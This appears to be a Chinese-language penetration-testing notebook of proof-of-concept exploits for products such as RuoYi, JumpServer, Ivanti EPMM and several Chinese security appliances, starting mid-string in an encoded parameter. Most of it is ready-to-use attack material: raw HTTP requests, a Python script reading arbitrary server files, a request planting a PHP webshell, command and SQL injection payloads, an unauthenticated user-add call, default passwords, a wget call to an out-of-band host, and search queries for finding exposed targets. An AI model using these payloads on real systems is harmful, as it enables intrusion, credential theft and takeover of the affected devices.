XeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami

锐捷 NBR 路由器

锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞

语法

app="Ruijie-NBR路由器"

poc

出现漏洞的文件在 /ddi/server/fileupload.php，该文件为标准的文件上传文件

POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1
Host: 
Accept: text/plain, */*; q=0.01
Content-Disposition: form-data; name="file"; filename="111.php"
Content-Type: image/jpeg

<?php phpinfo();?>

若依

4.5任意文件读取

若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件

影响范围

RuoYi < v4.5.1

fofa

app="若依-管理系统"

利用

登录后台后，访问url

https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd

可以用bp抓包改变参数获取敏感文件

poc

import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
    print('+------------------------------------------')
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')
    print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')
    print('+  \033[34m公众号 : PeiQi文库                                                     \033[0m')
    print('+  \033[34mVersion: RuoYi < v4.5.1                                            \033[0m')
    print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')
    print('+  \033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \033[0m')
    print('+  \033[36mCookie      >>> JSESSIONID=xxxxxx                                   \033[0m')
    print('+  \033[36mFile        >>> /etc/passwd                                         \033[0m')
    print('+------------------------------------------')

def POC_1(target_url, Cookie):
    vuln_url = target_url + "/common/download/resource?resource=/profile/../../../../etc/passwd"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Cookie":Cookie
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
        print("\033[32m[o] 正在请求 {}//common/download/resource?resource=/profile/../../../../etc/passwd \033[0m".format(target_url))
        if "root" in response.text and response.status_code == 200:
            print("\033[32m[o] 目标 {}存在漏洞 ,成功读取 /etc/passwd \033[0m".format(target_url))
            print("\033[32m[o] 响应为:\n{} \033[0m".format(response.text))
            while True:
                Filename = input("\033[35mFile >>> \033[0m")
                if Filename == "exit":
                    sys.exit(0)
                else:
                    POC_2(target_url, Cookie, Filename)
        else:
            print("\033[31m[x] 请求失败 \033[0m")
            sys.exit(0)
    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)

def POC_2(target_url, Cookie, Filename):
    vuln_url = target_url + "/common/download/resource?resource=/profile/../../../../{}".format(Filename)
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Cookie":Cookie
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
        print("\033[32m[o] 响应为:\n{} \033[0m".format(response.text))

    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)

if __name__ == '__main__':
    title()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    Cookie = str(input("\033[35mCookie >>> \033[0m"))
    POC_1(target_url, Cookie)

4.7.6任意文件下载

https://mp.weixin.qq.com/s/x_-N6YVzJW-INbJ02y_qVQ

POST /monitor/job/add HTTP/1.1
Host: 192.168.124.6
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 84
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=0655e330-b04f-4487-8617-715d58f2a82c
Origin: http://192.168.124.6
Referer: http://192.168.124.6/monitor/job
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0
X-Requested-With: XMLHttpRequest

createBy=admin&jobName=renwu&jobGroup=DEFAULT&invokeTarget=ruoYiConfig.setProfile('xxx/RuoYi/upload/123.txt')&cronExpression=0%2F15+*+*+*+*+%3F&misfirePolicy=1&concurrent=1&status=0&remark=



GET /common/download/resource?resource=xxxx.yaml;.zip HTTP/1.1
Host: 192.168.124.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=0655e330-b04f-4487-8617-715d58f2a82c
Referer: http://192.168.124.6/index
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0



POST /monitor/job/add HTTP/1.1
Host: 192.168.124.6
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 84
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=b99110bd-0cb2-44b8-a2e8-880d2082b81d
Origin: http://192.168.124.6
Referer: http://192.168.124.6/monitor/job
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0
X-Requested-With: XMLHttpRequest

createBy=admin&jobName=renwu&jobGroup=DEFAULT&invokeTarget=ruoYiConfig.setProfile('xxxx/RuoYi/upload')&cronExpression=0%2F15+*+*+*+*+%3F&misfirePolicy=1&concurrent=1&status=0&remark=



GET /common/download/resource?resource=/profile/123.txt HTTP/1.1
Host: 192.168.124.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=b99110bd-0cb2-44b8-a2e8-880d2082b81d
Referer: http://192.168.124.6/index
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0

eyoucms绕过后台登录

访问网站获取自己的session，然后脚本跑一下，使用跑出来的值就可以绕过后台登录

D:\soft\py_project\POC\eyoucms绕过后台登录.py

JumpServer

目录遍历穿越漏洞

需登录！！！登录用户可以访问和修改系统上任何文件的内容

CVE-2023-42819

影响版本

3.0.0 - 3.6.4

poc

用户“foo”单击“作业模板”菜单并创建名为“test”的剧本。从详细信息页面获取剧本 ID，例如“e0adabef-c38f-492d-bd92-832bacc3df5f”。攻击者可以使用提供的 URL 进行目录遍历

https://jumpserver-ip/api/v1/ops/playbook/e0adabef-c38f-492d-bd92-832bacc3df5f/file/?key=../../../../../../../etc/passwd

任意密码重置

CVE-2023-42820

影响版本

2.24 - 3.6.4

由于第三方库向 API 公开随机数种子，可能允许重播随机生成的验证码，这可能导致密码重置

https://github.com/jumpserver/jumpserver/security/advisories/GHSA-7prv-g565-82qp

未授权访问

CVE-2023-42442

影响版本

<=3.5.5

poc

GET /api/v1/terminal/sessions/ HTTP/1.1
Host: {{Hostname}}
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: identity
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: jms_csrftoken=7jey7HadfzOeWIPuaS9y3RjwrlfamxlRN6oigeqCeg8Tkcl3QdvbUUd3Hs5aZa8q; SESSION_COOKIE_NAME_PREFIX=jms_; jms_public_key="LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEWUlIL2g5REszNFFEZlpWcjdISHpYSTRsLwozLzdEOVlsWEYrQjdxOW1rM3R4RjF0bk53WWNLbUQrQjBsVFVxYjZiTWVnMjRWeW9mM0o3L1hMNHpvUFhZNFp1CkgxZmc2Zk9vbXBxUUptemFsTGY5ZEJXdHBmd1pUVW1MejZpZlhRTDA3QkxYZWRIeXVPZHlyZU1ELzRlWU40OUkKNk9ZMWsvQTNKVGw0eG5TWjRRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ=="; jms_sessionid=z62zrdkzk7rfjldmbrymv8ol5v5q4tud
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0

EPMM

未授权API 访问更改(CVE-2023-35078)

中发现了 CVE-2023-35078 远程未经身份验证的 API 访问漏洞。此漏洞影响所有受支持的版本 - 版本 11.4 发布 11.10、11.9 和 11.8。旧版本/版本也面临风险。此漏洞使未经授权的远程（面向互联网）攻击者能够访问用户的个人身份信息并对服务器进行有限的更改。

影响版本

Ivanti Endpoint Manager Mobile 11.10
Ivanti Endpoint Manager Mobile 11.9
Ivanti Endpoint Manager Mobile 11.8
不受支持的旧版本也会受到影响

语法

icon_hash="967636089"

poc

https://github.com/vchan-in/CVE-2023-35078-Exploit-POC

官方补丁

https://forums.ivanti.com/s/article/CVE-2023-35078-Remote-unauthenticated-API-access-vulnerability?language=en_US

https://forums.ivanti.com/s/article/KB-Remote-unauthenticated-API-access-vulnerability-CVE-2023-35078

安全厂商

安恒

明御运维审计与风险控制系统 xmlrpc.sock 任意用户添加漏洞

漏洞描述

安恒明御运维审计与风险控制系统 xmlrpc.sock 接口存在SSRF漏洞，通过漏洞可以添加任意用户控制堡垒机

fofa

"明御运维审计与风险控制系统"

poc

POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
Host: 
Cookie: LANG=zh; DBAPPUSM=ee4bbf6c85e541bb980ad4e0fbee2f57bb15bafe20a7028af9a0b8901cf80fd3
Content-Length: 1117
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<?xml version="1.0"?>  
<methodCall>
<methodName>web.user_add</methodName>
<params>
<param>
<value>
<array>
<data>
<value>
<string>admin</string>
</value>
<value>
<string>5</string>
</value>
<value>
<string>10.0.0.1</string>
</value>
</data>
</array>
</value>
</param>
<param>
<value>
<struct>
<member>
<name>uname</name>
<value>
<string>test</string>
</value>
</member>
<member>
<name>name</name>
<value>
<string>test</string>
</value>
</member>
<member>
<name>pwd</name>
<value>
<string>1qaz@3edC12345</string>
</value>
</member>
<member>
<name>authmode</name>
<value>
<string>1</string>
</value>
</member>
<member>
<name>deptid</name>
<value>
<string></string>
</value>
</member>
<member>
<name>email</name>
<value>
<string></string>
</value>
</member>
<member>
<name>mobile</name>
<value>
<string></string>
</value>
</member>
<member>
<name>comment</name>
<value>
<string></string>
</value>
</member>
<member>
<name>roleid</name>
<value>
<string>102</string>
</value>
</member>
</struct></value>
</param>
</params>
</methodCall>

安恒明御安全网关rce

HTTP
GET /webui/?g-aaa portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"<%3fphp+eval(\$_POST[\"a\"]);?>"+>+.lib.php HTTP/1.1
Host:xxX
Cookie: USGSESSID=495b895ddd42b82cd89a29f241825081
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0S X 10 16 0) AppleWebkit/537.36 (KHTML, likeGecko) Chrome/78.0.3904.108 safar/537.36
Sec-Fetch-User: ?1
Accept:
text/html,application/xhtml+xml,application/xml;g=0.9,image/webp,image/apng,*/*;g=0.8,application/signed-exchange;v=b3
sec-Fetch-site: none
sec-Fetch-Mode: navigate
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;g=0.9
Connection: close

shell: http://xxx/webui/.lib.php

绿盟

BAS日志数据安全性分析系统 accountmanage 未授权访问漏洞

语法

body="WebApi/encrypt/js-sha1/build/sha1.min.js"

未授权页面

/accountmanage/index

访问，添加用户直接登录

UTS综合威胁探针信息泄露登陆绕过漏洞

绿盟 UTS综合威胁探针某个接口未做授权导致未授权漏洞

语法

app="NSFOCUS-UTS综合威胁探针"

poc

/webapi/v1/system/accountmanage/account

可以看到账号和加密后的密码，登录的时候抓包替换

默认口令

admin/Nsfocus@123

auditor/auditor

SAS堡垒机 Exec 远程命令执行漏洞

语法

body="'/needUsbkey.php?username='"

poc

/webconf/Exec/index?cmd=wget%20xxx.dnslog.cn

SAS堡垒机 local_user.php 任意用户登录漏洞

绿盟堡垒机存在任意用户登录漏洞，攻击者通过漏洞包含 www/local_user.php 实现任意⽤户登录

fofa语法

body="'/needUsbkey.php?username='"

poc

get请求头添加

/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin

SAS堡垒机 GetFile 任意文件读取漏洞

绿盟堡垒机存在任意用户登录漏洞，攻击者通过漏洞包含 www/local_user.php 实现任意⽤户登录

语法

body="'/needUsbkey.php?username='"

poc

get请求添加

/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd

深信服

深信服应用交付管理系统 login 存在远程命令执行漏洞，攻击者通过漏洞可以获取服务器权限，执行任意命令

版本

深信服 应用交付管理系统 7.0.8-7.0.8R5

网络测绘

fid="iaytNA57019/kADk8Nev7g=="

poc

POST /rep/login 
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 118
Content-Type: application/x-www-form-urlencoded

clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123

奇安信

网神 SecSSL 3600安全接入网关系统未授权访问漏洞

网络测绘

app="安全接入网关SecSSLVPN"

poc

获取用户列表

GET /admin/group/x_group.php?id=2

Cookie: admin_id=1; gw_admin_ticket=1;

修改用户密码

POST /changepass.php?type=2 

Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"ceshi","subAuthId":"1"}
old_pass=&password=Asd123!@#123A&repassword=Asd123!@#123A

辰信领创

辰信领创辰信景云终端安全管理系统 login存在 SQL注入漏洞，攻击者通过漏洞可以获取数据库敏感信息

网络测绘

"辰信景云终端安全管理系统"

poc

POST /api/user/login

captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='